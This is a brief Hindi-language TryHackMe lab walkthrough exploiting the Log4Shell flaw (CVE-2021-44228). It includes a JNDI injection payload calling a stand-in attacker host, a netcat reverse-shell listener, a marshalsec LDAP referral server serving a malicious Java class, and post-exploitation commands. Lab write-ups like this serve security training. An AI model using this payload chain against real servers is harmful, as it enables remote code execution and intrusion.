
चरण-दर-चरण TryHackMe वॉकथ्रू, Log4Shell भेद्यता (CVE-2021-44228) का शोषण करके रिमोट कोड निष्पादन प्राप्त करने और फ़्लैग कैप्चर करने के लिए।
प्लेटफ़ॉर्म: TryHackMe कठिनाई: मध्यम विषय: Log4Shell (Log4j भेद्यता)
Log4j भेद्यता (CVE-2021-44228) का फायदा उठाकर रिमोट कोड एक्सीक्यूशन प्राप्त करें और फ़्लैग कैप्चर करें।
nmap -sC -sV <TARGET_IP>
Log4j भेद्यता JNDI इंजेक्शन की अनुमति देती है:
${jndi:ldap://<ATTACKER_IP>:1389/a}
यदि इनपुट लॉग किया जाता है → भेद्यता मौजूद है।
nc -lvnp 4444
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package
LDAP सर्वर चलाएँ:
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389
python3 -m http.server 8000
मैलिशियस Java क्लास (Exploit.class) बनाएँ
पेलोड को भेद्य फ़ील्ड में इंजेक्ट करें:
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}
💡 इन हेडर्स का उपयोग करें:
ट्रिगर होने के बाद:
जाँचें:
sudo -l
इनकी तलाश करें:
find / -name flag.txt 2>/dev/null
cat flag.txt